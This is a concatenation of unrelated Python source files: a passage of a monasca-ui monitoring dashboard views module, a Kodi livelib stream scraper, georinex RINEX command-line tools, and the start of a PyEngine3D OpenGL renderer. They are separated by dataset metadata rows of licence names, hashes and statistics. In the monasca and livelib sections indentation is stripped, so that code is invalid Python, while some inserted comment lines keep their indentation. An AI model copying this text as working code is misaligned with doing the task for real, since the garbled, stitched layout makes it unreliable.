return settings.DASHBOARDS
elif key == request.user.project_name:
#
# we match this project, return the project
# specific links.
#
return value
elif key == '*':
#
# this is a global setting, squirrel it away
# in case we exhaust the list without a project
# match
#
return value
return settings.DEFAULT_LINKS
except Exception:
LOG.warning("Failed to parse dashboard links by project, returning defaults.")
pass
#
# Extra safety here -- should have got a match somewhere above,
# but fall back to defaults.
#
return settings.DASHBOARDS
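# Example settings accepted above (hypothetical values). Either a flat list:
#   DASHBOARDS = [{'fileName': 'monitoring.json', 'title': 'Monitoring'}]
# or nested per project, with '*' as a global fallback:
#   DASHBOARDS = [{'project-a': [{'fileName': 'a.json', 'title': 'A'}]},
#                 {'*': [{'fileName': 'default.json', 'title': 'Default'}]}]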
def get_monitoring_services(request):
#
# GRAFANA_LINKS is a list of dictionaries, but can either
# be a nested list of dictionaries indexed by project name
# (or '*'), or simply the list of links to display. This
# code is a bit more complicated as a result but will allow
# for backward compatibility and ensure existing installations
# that don't take advantage of project specific dashboard
# links are unaffected. The 'non_project_keys' are the
# expected dictionary keys for the list of dashboard links,
# so if we encounter one of those, we know we're supporting
# legacy/non-project specific behavior.
#
# See examples of both in local_settings.py
#
non_project_keys = {'name', 'groupBy'}
try:
for group in settings.MONITORING_SERVICES:
key = list(group.keys())[0]
value = list(group.values())[0]
if key in non_project_keys:
#
# we're not indexed by project, just return
# the whole list.
#
return settings.MONITORING_SERVICES
elif key == request.user.project_name:
#
# we match this project, return the project
# specific links.
#
return value
elif key == '*':
#
# this is a global setting, squirrel it away
# in case we exhaust the list without a project
# match
#
return value
return settings.MONITORING_SERVICES
except Exception:
LOG.warning("Failed to parse monitoring services by project, returning defaults.")
pass
#
# Extra safety here -- should have got a match somewhere above,
# but fall back to defaults.
#
return settings.MONITORING_SERVICES
def show_by_dimension(data, dim_name):
if 'metrics' in data:
dimensions = []
for metric in data['metrics']:
if 'dimensions' in metric:
if dim_name in metric['dimensions']:
dimension = metric['dimensions'][dim_name]
dimensions.append(dimension)
return dimensions
return []
def get_status(alarms):
if not alarms:
return 'chicklet-notfound'
status_index = 0
for a in alarms:
severity = alarm_tables.show_severity(a)
severity_index = index_by_severity.get(severity, None)
status_index = max(status_index, severity_index)
return priorities[status_index]['status']
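# e.g. alarms carrying severities ['OK', 'CRITICAL'] map to 'btn-danger',
# while an empty alarm list maps to 'chicklet-notfound'.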
def generate_status(request):
try:
alarms = api.monitor.alarm_list(request)
except Exception as e:
messages.error(request,
_('Unable to list alarms: %s') % str(e))
alarms = []
alarms_by_service = {}
for a in alarms:
service = alarm_tables.get_service(a)
service_alarms = alarms_by_service.setdefault(service, [])
service_alarms.append(a)
monitoring_services = copy.deepcopy(get_monitoring_services(request))
for row in monitoring_services:
row['name'] = str(row['name'])
if 'groupBy' in row:
alarms_by_group = {}
for a in alarms:
groups = show_by_dimension(a, row['groupBy'])
if groups:
for group in groups:
group_alarms = alarms_by_group.setdefault(group, [])
group_alarms.append(a)
services = []
for group, group_alarms in alarms_by_group.items():
name = '%s=%s' % (row['groupBy'], group)
# Encode as base64url to be able to include '/'
# encoding and decoding is required because of python3 compatibility
# urlsafe_b64encode requires byte-type text
name = 'b64:' + base64.urlsafe_b64encode(name.encode('utf-8')).decode('utf-8')
service = {
'display': group,
'name': name,
'class': get_status(group_alarms)
}
service['icon'] = get_icon(service['class'])
services.append(service)
row['services'] = services
else:
for service in row['services']:
service_alarms = alarms_by_service.get(service['name'], [])
service['class'] = get_status(service_alarms)
service['icon'] = get_icon(service['class'])
service['display'] = str(service['display'])
return monitoring_services
class IndexView(TemplateView):
template_name = constants.TEMPLATE_PREFIX + 'index.html'
def get_context_data(self, **kwargs):
if not policy.check((('monitoring', 'monitoring:monitoring'), ), self.request):
raise exceptions.NotAuthorized()
context = super(IndexView, self).get_context_data(**kwargs)
try:
region = self.request.user.services_region
context["grafana_url"] = getattr(settings, 'GRAFANA_URL').get(region, '')
except AttributeError:
# Catches case where Grafana 2 is not enabled.
proxy_url_path = str(reverse_lazy(constants.URL_PREFIX + 'proxy'))
api_root = self.request.build_absolute_uri(proxy_url_path)
context["api"] = api_root
context["dashboards"] = get_dashboard_links(self.request)
# Ensure all links have a 'raw' attribute
for link in context["dashboards"]:
link['raw'] = link.get('raw', False)
context['can_access_kibana'] = policy.check(
((getattr(settings, 'KIBANA_POLICY_SCOPE'), getattr(settings, 'KIBANA_POLICY_RULE')), ),
self.request
)
context['enable_log_management_button'] = settings.ENABLE_LOG_MANAGEMENT_BUTTON
context['enable_event_management_button'] = settings.ENABLE_EVENT_MANAGEMENT_BUTTON
context['show_grafana_home'] = settings.SHOW_GRAFANA_HOME
return context
class MonascaProxyView(TemplateView):
template_name = ""
def _convert_dimensions(self, req_kwargs):
"""Converts the dimension string service:monitoring into a dict
This method converts the dimension string
service:monitoring (requested by a query string arg)
into a python dict that looks like
{"service": "monitoring"} (used by monasca api calls)
"""
dim_dict = {}
if 'dimensions' in req_kwargs:
dimensions_str = req_kwargs['dimensions'][0]
dimensions_str_array = dimensions_str.split(',')
for dimension in dimensions_str_array:
# limit splitting since value may contain a ':' such as in
# the `url` dimension of the service_status check.
dimension_name_value = dimension.split(':', 1)
if len(dimension_name_value) == 2:
name = dimension_name_value[0]
value = dimension_name_value[1]
dim_dict[name] = urllib.parse.unquote(value)
else:
raise Exception('Dimensions are malformed')
#
# If the request specifies 'INJECT_REGION' as the region, we'll
# replace with the horizon scoped region. We can't do this by
# default, since some implementations don't publish region as a
# dimension for all metrics (mini-mon for one).
#
if 'region' in dim_dict and dim_dict['region'] == 'INJECT_REGION':
dim_dict['region'] = self.request.user.services_region
req_kwargs['dimensions'] = dim_dict
return req_kwargs
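    # e.g. ?dimensions=service:monitoring,url:http%3A%2F%2Fhost:8070
    #   -> req_kwargs['dimensions'] == {'service': 'monitoring',
    #                                   'url': 'http://host:8070'}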
def get(self, request, *args, **kwargs):
# monasca_endpoint = api.monitor.monasca_endpoint(self.request)
restpath = self.kwargs['restpath']
results = None
parts = restpath.split('/')
if "metrics" == parts[0]:
req_kwargs = dict(self.request.GET)
self._convert_dimensions(req_kwargs)
if len(parts) == 1:
results = {'elements': api.monitor.
metrics_list(request,
**req_kwargs)}
elif "statistics" == parts[1]:
results = {'elements': api.monitor.
metrics_stat_list(request,
**req_kwargs)}
elif "measurements" == parts[1]:
results = {'elements': api.monitor.
metrics_measurement_list(request,
**req_kwargs)}
elif "dimensions" == parts[1]:
results = {'elements': api.monitor.
metrics_dimension_value_list(request,
**req_kwargs)}
if not results:
LOG.warning("There was a request made for the path %s that"
" is not supported." % restpath)
results = {}
return HttpResponse(json.dumps(results),
content_type='application/json')
class StatusView(TemplateView):
template_name = ""
def get(self, request, *args, **kwargs):
ret = {
'series': generate_status(self.request),
'settings': {}
}
return HttpResponse(json.dumps(ret),
content_type='application/json')
class _HttpMethodRequest(urllib.request.Request):
def __init__(self, method, url, **kwargs):
urllib.request.Request.__init__(self, url, **kwargs)
self.method = method
def get_method(self):
return self.method
def proxy_stream_generator(response):
while True:
chunk = response.read(1000 * 1024)
if not chunk:
break
yield chunk
class KibanaProxyView(generic.View):
base_url = None
http_method_names = ['GET', 'POST', 'PUT', 'DELETE', 'HEAD']
def read(self, method, url, data, headers):
proxy_request_url = self.get_absolute_url(url)
proxy_request = _HttpMethodRequest(
method, proxy_request_url, data=data, headers=headers
)
try:
response = urllib.request.urlopen(proxy_request)
except urllib.error.HTTPError as e:
return http.HttpResponse(
e.read(),
status=e.code,
content_type=e.hdrs['content-type']
)
except urllib.error.URLError as e:
return http.HttpResponse(e.reason, 404)
else:
status = response.getcode()
proxy_response = http.StreamingHttpResponse(
proxy_stream_generator(response),
status=status,
content_type=response.headers['content-type']
)
if 'set-cookie' in response.headers:
proxy_response['set-cookie'] = response.headers['set-cookie']
return proxy_response
@csrf_exempt
def dispatch(self, request, url):
if not url:
url = '/'
if request.method not in self.http_method_names:
return http.HttpResponseNotAllowed(request.method)
if not self._can_access_kibana():
error_msg = (_('User %s does not have sufficient '
'privileges to access Kibana')
% auth_utils.get_user(request))
LOG.error(error_msg)
return http.HttpResponseForbidden(content=error_msg)
# passing kbn version explicitly for kibana >= 4.3.x
headers = {
"X-Auth-Token": request.user.token.id,
"kbn-version": request.META.get("HTTP_KBN_VERSION", ""),
"Cookie": request.META.get("HTTP_COOKIE", ""),
"Content-Type": "application/json",
}
return self.read(request.method, url, request.body, headers)
def get_relative_url(self, url):
url = urllib.parse.quote(url.encode('utf-8'))
params_str = self.request.GET.urlencode()
if params_str:
return '{0}?{1}'.format(url, params_str)
return url
def get_absolute_url(self, url):
return self.base_url + self.get_relative_url(url).lstrip('/')
def _can_access_kibana(self):
return policy.check(
((getattr(settings, 'KIBANA_POLICY_SCOPE'), getattr(settings, 'KIBANA_POLICY_RULE')), ),
self.request
)
| apache-2.0 | 8,722,627,612,540,159,000 | 36.810502 | 100 | 0.577381 | false | 4.352431 | false | false | false |
huseyinbiyik/script.module.livelib | lib/livelib.py | 2 | 2019 | import boogietools as bt
import sys
import xbmcgui
class livelib():
def __init__(self):
self.timeout=None
def scrape(self,scraper,*args,**kwargs):
try:
module=__import__("scrapers",fromlist=[scraper])
scraper_function=getattr(module,scraper)
except Exception,e:
type="ERROR: LIVELIB | No scraper for %s"%scraper
result=e
return type,result
try:
type,result=scraper_function.run(*args,**kwargs)
except Exception,e:
type="ERROR: LIVELIB | Scraper \'%s\' can't scrape the service"%scraper
result=e
return type,result
header="*************** LIVELIB %s ARGUMENTS ***************"%type.upper()
print header
for k,v in result.iteritems():
print "%s:%s"%(k,str(v))
print "*"*len(header)
return type,result
def scrape_url(self,scraper,*args,**kwargs):
type,params=self.scrape(scraper,*args,**kwargs)
if "ERROR:" in type:
return type,params
if type in ["rtmp","rtmpe"]:
            url = ""
            if "tcUrl" in params.keys():
                url = self._escape_rtmp(params["tcUrl"])
                params.pop("tcUrl")
if not self.timeout is None:
params["timeout"]=self.timeout
for k,v in params.iteritems():
if k=="conn":
for kc in sorted(v.keys()):
url+=" conn=%s"%self._escape_rtmp(v[kc])
continue
url+=" %s=%s"%(k,self._escape_rtmp(v))
return type,url
else:
return "ERROR: LIVELIB | Can't detect stream type %s"%type,""
if type in ["m3u","m3u8"]:
return type,params
def scrape_li(self,scraper,*args,**kwargs):
type,params=self.scrape(scraper,*args,**kwargs)
if "ERROR:" in type:
return type,params
if type in ["rtmp","rtmpe"]:
item = xbmcgui.ListItem(path=str(params["tcUrl"]))
params.pop("tcUrl")
for k,v in params.iteritems():
item.setProperty(str(k), str(v))
return type,item
else:
return "ERROR: LIVELIB | Can't convert stream type %s to ListItem"%type,None
def _escape_rtmp(self,s):
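        """Escape characters that break librtmp parameter parsing: space,
        '?' and '&' are replaced by backslash-hex, e.g. 'a b' -> 'a\\20b'."""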
s=str(s)
escaped=[" ","?","&"]
for c in escaped:
if c in s:
s=s.replace(c,"\\%s"%hex(ord(c))[2:])
return s | gpl-2.0 | -2,178,086,190,224,053,200 | 26.297297 | 79 | 0.631005 | false | 2.847673 | false | false | false |
scienceopen/pyrinex | src/georinex/__main__.py | 1 | 8696 | import argparse
from pathlib import Path
import numpy as np
from datetime import timedelta
import logging
import georinex as gr
def georinex_read():
"""
    Read a RINEX 2/3 OBS/NAV file and plot it (or convert it to NetCDF4 / HDF5).
    Returns the data as an xarray.Dataset: think of it as an N-dimensional
    NumPy ndarray with rich metadata and labeled indexing.
    Xarray can be thought of as an analytically tuned Pandas.
The RINEX version is automatically detected.
Compressed RINEX files including:
* GZIP .gz
* ZIP .zip
* LZW .Z
* Hatanaka .crx / .crx.gz
are handled seamlessly via TextIO stream.
Examples:
# read RINEX files (NAV/OBS, Rinex 2 or 3, Hatanaka, etc.)
georinex_read ~/data/VEN100ITA_R_20181580000_01D_MN.rnx.gz
georinex_read ~/data/ABMF00GLP_R_20181330000_01D_30S_MO.zip
# read a limited range of time in a RINEX file
georinex_read ~/data/PUMO00CR__R_20180010000_01D_15S_MO.rnx -t 2018-01-01 2018-01-01T00:30
"""
p = argparse.ArgumentParser(
description="example of reading RINEX 2/3 Navigation/Observation file"
)
p.add_argument("rinexfn", help="path to RINEX 2 or RINEX 3 file")
p.add_argument("-o", "--out", help="write data to path or file as NetCDF4")
p.add_argument("-v", "--verbose", action="store_true")
p.add_argument("-p", "--plot", help="display plots", action="store_true")
p.add_argument("-u", "--use", help="select which GNSS system(s) to use", nargs="+")
p.add_argument("-m", "--meas", help="select which GNSS measurement(s) to use", nargs="+")
p.add_argument("-t", "--tlim", help="specify time limits (process part of file)", nargs=2)
p.add_argument(
"-useindicators",
help="use SSI, LLI indicators (signal, loss of lock)",
action="store_true",
)
p.add_argument(
"-strict",
        help="do not use speculative preallocation (slow); let us know if this is needed",
action="store_false",
)
p.add_argument("-interval", help="read the rinex file only every N seconds", type=float)
P = p.parse_args()
data = gr.load(
P.rinexfn,
P.out,
use=P.use,
tlim=P.tlim,
useindicators=P.useindicators,
meas=P.meas,
verbose=P.verbose,
fast=P.strict,
interval=P.interval,
)
# %% plots
if P.plot:
import georinex.plots as grp
from matplotlib.pyplot import show
grp.timeseries(data)
show()
else:
print(data)
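def _example_load_sketch():
    """Illustrative sketch, not part of the CLI: the same read the command
    line performs, done from Python. The file path and time window below are
    hypothetical assumptions."""
    obs = gr.load("~/data/demo_MO.rnx.gz", use="G",
                  tlim=("2018-01-01", "2018-01-01T00:30"))
    return obs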
def georinex_plot():
"""
PyRINEX plotting example
includes how to index by satellite, measurement type and time
"""
import matplotlib.dates as md
from matplotlib.pyplot import figure, show
p = argparse.ArgumentParser(description="Plot raw Rinex data")
p.add_argument("rinexfn", help="RINEX file to analyze")
p.add_argument("sv", help="SVs to analyze e.g. G14 C12", nargs="+")
p.add_argument(
"-t",
"--tlim",
help="time limits (start stop) e.g. 2017-05-25T12:47 2017-05-25T13:05",
nargs=2,
)
p.add_argument(
"-w", "--what", help="what measurements to plot e.g. L1C", nargs="+", default=["L1C", "P1"]
)
P = p.parse_args()
rinexfn = Path(P.rinexfn).expanduser()
obs = gr.load(rinexfn, use="G")
# %% optional time indexing demo
# can use datetime or string
# boolean indexing -- set "i=slice(None)" to disable time indexing.
if P.tlim is not None:
i = (obs.time >= np.datetime64(P.tlim[0])) & (obs.time <= np.datetime64(P.tlim[1]))
else:
i = slice(None)
# %% plot
SV = P.sv
what = P.what
# FIXME: make these title automatic based on requested measurement?
# titles = ['Psedoranges of GPS and Glonass', 'Carrier Phase', 'Doppler', 'Signal Strength']
# ylabels = ['Pseudoranges', 'Phase', 'Doppler', 'signal strength']
fg = figure(figsize=(9, 9))
axs = fg.subplots(4, 1, sharex=True)
    for v, ax in zip(what, axs):
        if v not in obs:
            continue
        Satobs = obs[v][i].sel(sv=SV).dropna(dim="time", how="all")
        Satobs.plot(ax=ax)
        ax.set_title(v)
        ax.set_ylabel(v)
ax.legend(loc="center left", bbox_to_anchor=(1, 0.5))
axs[-1].set_xlabel("Time [UTC]")
axs[-1].xaxis.set_major_formatter(md.DateFormatter("%Y-%m-%dT%H:%M"))
fg.suptitle(f"{rinexfn.name} satellite {SV}")
show()
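def _example_time_window(obs, start="2017-05-25T12:47", stop="2017-05-25T13:05"):
    """Illustrative sketch of the boolean time indexing used above; ``obs`` is
    an xarray.Dataset from gr.load and the bounds are hypothetical."""
    mask = (obs.time >= np.datetime64(start)) & (obs.time <= np.datetime64(stop))
    return obs.sel(time=obs.time[mask])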
def rinex2hdf5():
"""
Converts RINEX 2/3 NAV/OBS to NetCDF4 / HDF5
The RINEX version is automatically detected.
Compressed RINEX files including:
* GZIP .gz
* ZIP .zip
* LZW .Z
* Hatanaka .crx / .crx.gz
are handled seamlessly via TextIO stream.
Examples:
# batch convert RINEX OBS2 to NetCDF4/HDF5
rnx2hdf5.py ~/data "*o"
rnx2hdf5.py ~/data "*o.Z"
rnx2hdf5.py ~/data "*o.zip"
# batch convert RINEX OBS3 to NetCDF4/HDF5
rnx2hdf5.py ~/data "*MO.rnx"
rnx2hdf5.py ~/data "*MO.rnx.gz"
# batch convert compressed Hatanaka RINEX files to NetCDF4 / HDF5
rnx2hdf5.py ~/data "*.crx.gz"
"""
p = argparse.ArgumentParser(
description="example of reading RINEX 2/3 Navigation/Observation file"
)
p.add_argument("indir", help="path to RINEX 2 or RINEX 3 files to convert")
p.add_argument("glob", help="file glob pattern", nargs="?", default="*")
p.add_argument("-o", "--out", help="write data to path or file as NetCDF4")
p.add_argument("-v", "--verbose", action="store_true")
p.add_argument("-p", "--plot", help="display plots", action="store_true")
p.add_argument("-u", "--use", help="select which GNSS system(s) to use", nargs="+")
p.add_argument("-m", "--meas", help="select which GNSS measurement(s) to use", nargs="+")
p.add_argument("-t", "--tlim", help="specify time limits (process part of file)", nargs=2)
p.add_argument(
"-useindicators",
help="use SSI, LLI indicators (signal, loss of lock)",
action="store_true",
)
p.add_argument(
"-strict",
        help="do not use speculative preallocation (slow); let us know if this is needed",
action="store_false",
)
P = p.parse_args()
gr.batch_convert(
P.indir,
P.glob,
P.out,
use=P.use,
tlim=P.tlim,
useindicators=P.useindicators,
meas=P.meas,
verbose=P.verbose,
fast=P.strict,
)
def georinex_time():
p = argparse.ArgumentParser()
p.add_argument("filename", help="RINEX filename to get times from")
p.add_argument("-glob", help="file glob pattern", nargs="+", default="*")
p.add_argument("-v", "--verbose", action="store_true")
p = p.parse_args()
filename = Path(p.filename).expanduser()
print("filename: start, stop, number of times, interval")
if filename.is_dir():
flist = gr.globber(filename, p.glob)
for f in flist:
eachfile(f, p.verbose)
elif filename.is_file():
eachfile(filename, p.verbose)
else:
raise FileNotFoundError(f"{filename} is not a path or file")
def eachfile(fn: Path, verbose: bool = False):
try:
times = gr.gettime(fn)
except ValueError as e:
if verbose:
print(f"{fn.name}: {e}")
return
# %% output
Ntimes = times.size
if Ntimes == 0:
return
ostr = f"{fn.name}:" f" {times[0].isoformat()}" f" {times[-1].isoformat()}" f" {Ntimes}"
hdr = gr.rinexheader(fn)
interval = hdr.get("interval", np.nan)
    if not np.isnan(interval):
ostr += f" {interval}"
Nexpect = (times[-1] - times[0]) // timedelta(seconds=interval) + 1
if Nexpect != Ntimes:
logging.warning(f"{fn.name}: expected {Nexpect} but got {Ntimes} times")
print(ostr)
if verbose:
print(times)
def georinex_loc():
"""
Visualize location of all receivers on map,
where color & size are proportional to measurement interval (smaller is better)
"""
from matplotlib.pyplot import show
import georinex.plots_geo as grp
import georinex.geo as gg
p = argparse.ArgumentParser(description="plot receiver locations")
p.add_argument("indir", help="path to RINEX 2 or RINEX 3 files")
p.add_argument(
"-glob",
help="file glob pattern",
nargs="+",
default=["*o", "*O.rnx", "*O.rnx.gz", "*O.crx", "*O.crx.gz"],
)
p = p.parse_args()
indir = Path(p.indir).expanduser()
flist = gr.globber(indir, p.glob)
locs = gg.get_locations(flist)
grp.receiver_locations(locs)
show()
| mit | 2,579,951,635,595,863,600 | 29.512281 | 109 | 0.604991 | false | 3.238734 | false | false | false |
ubuntunux/PyEngine3D | PyEngine3D/Render/Renderer.py | 1 | 60697 | from ctypes import c_void_p
import math
import numpy as np
from OpenGL.GL import *
from OpenGL.GLU import *
from PyEngine3D.Common import logger, COMMAND
from PyEngine3D.Common.Constants import *
from PyEngine3D.Utilities import *
from PyEngine3D.OpenGLContext import InstanceBuffer, FrameBufferManager, RenderBuffer, UniformBlock, CreateTexture
from .PostProcess import AntiAliasing, PostProcess
from . import RenderTargets, RenderOption, RenderingType, RenderGroup, RenderMode
from . import SkeletonActor, StaticActor, ScreenQuad, Line
from . import Spline3D
class Renderer(Singleton):
def __init__(self):
self.initialized = False
self.view_mode = GL_FILL
# managers
self.core_manager = None
self.viewport_manager = None
self.resource_manager = None
self.font_manager = None
self.scene_manager = None
self.debug_line_manager = None
self.render_option_manager = None
self.rendertarget_manager = None
self.framebuffer_manager = None
self.postprocess = None
# components
self.viewport = None
self.debug_texture = None
self.blend_enable = False
self.blend_equation = GL_FUNC_ADD
self.blend_func_src = GL_SRC_ALPHA
self.blend_func_dst = GL_ONE_MINUS_SRC_ALPHA
self.blend_enable_prev = self.blend_enable
self.blend_equation_prev = self.blend_equation
self.blend_func_src_prev = self.blend_func_src
self.blend_func_dst_prev = self.blend_func_dst
# scene constants uniform buffer
self.uniform_scene_buffer = None
self.uniform_scene_data = None
self.uniform_view_buffer = None
self.uniform_view_data = None
self.uniform_view_projection_buffer = None
self.uniform_view_projection_data = None
self.uniform_light_buffer = None
self.uniform_light_data = None
self.uniform_point_light_buffer = None
self.uniform_point_light_data = None
self.uniform_particle_common_buffer = None
self.uniform_particle_common_data = None
self.uniform_particle_infos_buffer = None
self.uniform_particle_infos_data = None
# material instances
self.scene_constants_material = None
self.debug_bone_material = None
self.shadowmap_material = None
self.shadowmap_skeletal_material = None
self.static_object_id_material = None
self.skeletal_object_id_material = None
self.selcted_static_object_material = None
self.selcted_skeletal_object_material = None
self.selcted_object_composite_material = None
self.render_color_material = None
self.render_heightmap_material = None
# font
self.font_instance_buffer = None
self.font_shader = None
self.actor_instance_buffer = None
self.render_custom_translucent_callbacks = []
def initialize(self, core_manager):
logger.info("Initialize Renderer")
self.core_manager = core_manager
self.viewport_manager = core_manager.viewport_manager
self.viewport = self.viewport_manager.main_viewport
self.resource_manager = core_manager.resource_manager
self.render_option_manager = core_manager.render_option_manager
self.font_manager = core_manager.font_manager
self.scene_manager = core_manager.scene_manager
self.debug_line_manager = core_manager.debug_line_manager
self.rendertarget_manager = core_manager.rendertarget_manager
self.postprocess = PostProcess()
self.postprocess.initialize()
self.framebuffer_manager = FrameBufferManager.instance()
# material instances
self.scene_constants_material = self.resource_manager.get_material_instance('scene_constants_main')
self.debug_bone_material = self.resource_manager.get_material_instance("debug_bone")
self.shadowmap_material = self.resource_manager.get_material_instance("shadowmap")
self.shadowmap_skeletal_material = self.resource_manager.get_material_instance(name="shadowmap_skeletal",
shader_name="shadowmap",
macros={"SKELETAL": 1})
self.static_object_id_material = self.resource_manager.get_material_instance(name="render_static_object_id",
shader_name="render_object_id")
self.skeletal_object_id_material = self.resource_manager.get_material_instance(name="render_skeletal_object_id",
shader_name="render_object_id",
macros={"SKELETAL": 1})
self.selcted_static_object_material = self.resource_manager.get_material_instance("selected_object")
self.selcted_skeletal_object_material = self.resource_manager.get_material_instance(name="selected_object_skeletal",
shader_name="selected_object",
macros={"SKELETAL": 1})
self.selcted_object_composite_material = self.resource_manager.get_material_instance("selected_object_composite")
self.render_color_material = self.resource_manager.get_material_instance(name="render_object_color", shader_name="render_object_color")
self.render_heightmap_material = self.resource_manager.get_material_instance(name="render_heightmap", shader_name="render_heightmap")
# font
self.font_shader = self.resource_manager.get_material_instance("font")
self.font_instance_buffer = InstanceBuffer(name="font_offset", location_offset=1, element_datas=[FLOAT4_ZERO, ])
# instance buffer
self.actor_instance_buffer = InstanceBuffer(name="actor_instance_buffer", location_offset=7, element_datas=[MATRIX4_IDENTITY, ])
# scene constants uniform buffer
program = self.scene_constants_material.get_program()
self.uniform_scene_data = np.zeros(1, dtype=[('TIME', np.float32),
('JITTER_FRAME', np.float32),
('RENDER_SSR', np.int32),
('RENDER_SSAO', np.int32),
('SCREEN_SIZE', np.float32, 2),
('BACKBUFFER_SIZE', np.float32, 2),
('MOUSE_POS', np.float32, 2),
('DELTA_TIME', np.float32),
('SCENE_DUMMY_0', np.int32)])
self.uniform_scene_buffer = UniformBlock("scene_constants", program, 0, self.uniform_scene_data)
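        # Note: the *_DUMMY fields in these record dtypes pad each struct to a
        # 16-byte (std140) boundary so the numpy layout matches the GLSL
        # uniform block layout.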
self.uniform_view_data = np.zeros(1, dtype=[('VIEW', np.float32, (4, 4)),
('INV_VIEW', np.float32, (4, 4)),
('VIEW_ORIGIN', np.float32, (4, 4)),
('INV_VIEW_ORIGIN', np.float32, (4, 4)),
('PROJECTION', np.float32, (4, 4)),
('INV_PROJECTION', np.float32, (4, 4)),
('CAMERA_POSITION', np.float32, 3),
('VIEW_DUMMY_0', np.float32),
('NEAR_FAR', np.float32, 2),
('JITTER_DELTA', np.float32, 2),
('JITTER_OFFSET', np.float32, 2),
('VIEWCONSTANTS_DUMMY0', np.float32, 2)])
self.uniform_view_buffer = UniformBlock("view_constants", program, 1, self.uniform_view_data)
self.uniform_view_projection_data = np.zeros(1, dtype=[('VIEW_PROJECTION', np.float32, (4, 4)),
('PREV_VIEW_PROJECTION', np.float32, (4, 4))])
self.uniform_view_projection_buffer = UniformBlock("view_projection", program, 2,
self.uniform_view_projection_data)
self.uniform_light_data = np.zeros(1, dtype=[('SHADOW_MATRIX', np.float32, (4, 4)),
('LIGHT_POSITION', np.float32, 3),
('SHADOW_EXP', np.float32),
('LIGHT_DIRECTION', np.float32, 3),
('SHADOW_BIAS', np.float32),
('LIGHT_COLOR', np.float32, 3),
('SHADOW_SAMPLES', np.int32)])
self.uniform_light_buffer = UniformBlock("light_constants", program, 3, self.uniform_light_data)
self.uniform_point_light_data = np.zeros(MAX_POINT_LIGHTS, dtype=[('color', np.float32, 3),
('radius', np.float32),
('pos', np.float32, 3),
('render', np.float32)])
self.uniform_point_light_buffer = UniformBlock("point_light_constants", program, 4, self.uniform_point_light_data)
self.uniform_particle_common_data = np.zeros(1, dtype=[
('PARTICLE_COLOR', np.float32, 3),
('PARTICLE_ALIGN_MODE', np.int32),
('PARTICLE_CELL_COUNT', np.int32, 2),
('PARTICLE_BLEND_MODE', np.int32),
('PARTICLE_COMMON_DUMMY_0', np.int32)
])
self.uniform_particle_common_buffer = UniformBlock("particle_common", program, 5, self.uniform_particle_common_data)
self.uniform_particle_infos_data = np.zeros(1, dtype=[
('PARTICLE_PARENT_MATRIX', np.float32, (4, 4)),
('PARTICLE_DELAY', np.float32, 2),
('PARTICLE_LIFE_TIME', np.float32, 2),
('PARTICLE_TRANSFORM_ROTATION_MIN', np.float32, 3),
('PARTICLE_FADE_IN', np.float32),
('PARTICLE_TRANSFORM_ROTATION_MAX', np.float32, 3),
('PARTICLE_FADE_OUT', np.float32),
('PARTICLE_TRANSFORM_SCALE_MIN', np.float32, 3),
('PARTICLE_OPACITY', np.float32),
('PARTICLE_TRANSFORM_SCALE_MAX', np.float32, 3),
('PARTICLE_ENABLE_VECTOR_FIELD', np.int32),
('PARTICLE_VELOCITY_POSITION_MIN', np.float32, 3),
('PARTICLE_VECTOR_FIELD_STRENGTH', np.float32),
('PARTICLE_VELOCITY_POSITION_MAX', np.float32, 3),
('PARTICLE_VECTOR_FIELD_TIGHTNESS', np.float32),
('PARTICLE_VELOCITY_ROTATION_MIN', np.float32, 3),
('PARTICLE_MAX_COUNT', np.uint32),
('PARTICLE_VELOCITY_ROTATION_MAX', np.float32, 3),
('PARTICLE_SPAWN_COUNT', np.uint32),
('PARTICLE_VELOCITY_SCALE_MIN', np.float32, 3),
('PARTICLE_VELOCITY_STRETCH', np.float32),
('PARTICLE_VELOCITY_SCALE_MAX', np.float32, 3),
('PARTICLE_VELOCITY_ACCELERATION', np.float32),
('PARTICLE_VECTOR_FIELD_MATRIX', np.float32, (4, 4)),
('PARTICLE_VECTOR_FIELD_INV_MATRIX', np.float32, (4, 4)),
('PARTICLE_SPAWN_VOLUME_INFO', np.float32, 3),
('PARTICLE_SPAWN_VOLUME_TYPE', np.uint32),
('PARTICLE_SPAWN_VOLUME_MATRIX', np.float32, (4, 4)),
('PARTICLE_VELOCITY_LIMIT', np.float32, 2),
('PARTICLE_FORCE_GRAVITY', np.float32),
('PARTICLE_PLAY_SPEED', np.float32),
('PARTICLE_VELOCITY_TYPE', np.uint32),
('PARTICLE_FORCE_ELASTICITY', np.float32),
('PARTICLE_FORCE_FRICTION', np.float32),
('PARTICLE_DUMMY_0', np.uint32),
])
self.uniform_particle_infos_buffer = UniformBlock("particle_infos", program, 6, self.uniform_particle_infos_data)
def get_rendering_type_name(rendering_type):
rendering_type = str(rendering_type)
return rendering_type.split('.')[-1] if '.' in rendering_type else rendering_type
rendering_type_list = [get_rendering_type_name(RenderingType.convert_index_to_enum(x)) for x in range(RenderingType.COUNT.value)]
self.initialized = True
# Send to GUI
self.core_manager.send_rendering_type_list(rendering_type_list)
def close(self):
pass
def render_custom_translucent(self, render_custom_translucent_callback):
self.render_custom_translucent_callbacks.append(render_custom_translucent_callback)
def set_blend_state(self, blend_enable=True, equation=GL_FUNC_ADD, func_src=GL_SRC_ALPHA, func_dst=GL_ONE_MINUS_SRC_ALPHA):
self.blend_enable_prev = self.blend_enable
self.blend_equation_prev = self.blend_equation
self.blend_func_src_prev = self.blend_func_src
self.blend_func_dst_prev = self.blend_func_dst
self.blend_enable = blend_enable
if blend_enable:
self.blend_equation = equation
self.blend_func_src = func_src
self.blend_func_dst = func_dst
glEnable(GL_BLEND)
glBlendEquation(equation)
glBlendFunc(func_src, func_dst)
else:
glDisable(GL_BLEND)
def restore_blend_state_prev(self):
self.set_blend_state(self.blend_enable_prev,
self.blend_equation_prev,
self.blend_func_src_prev,
self.blend_func_dst_prev)
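    # Illustrative use of the save/restore pair above (hypothetical call
    # site, not invoked in this module):
    #   self.set_blend_state(True, GL_FUNC_ADD, GL_ONE, GL_ONE)  # additive pass
    #   ...draw...
    #   self.restore_blend_state_prev()  # back to the previous blend state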
def set_view_mode(self, view_mode):
if view_mode == COMMAND.VIEWMODE_WIREFRAME:
self.view_mode = GL_LINE
elif view_mode == COMMAND.VIEWMODE_SHADING:
self.view_mode = GL_FILL
def reset_renderer(self):
self.scene_manager.update_camera_projection_matrix(aspect=self.core_manager.game_backend.aspect)
self.framebuffer_manager.clear_framebuffer()
self.rendertarget_manager.create_rendertargets()
self.scene_manager.reset_light_probe()
self.core_manager.gc_collect()
def ortho_view(self, look_at=True):
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
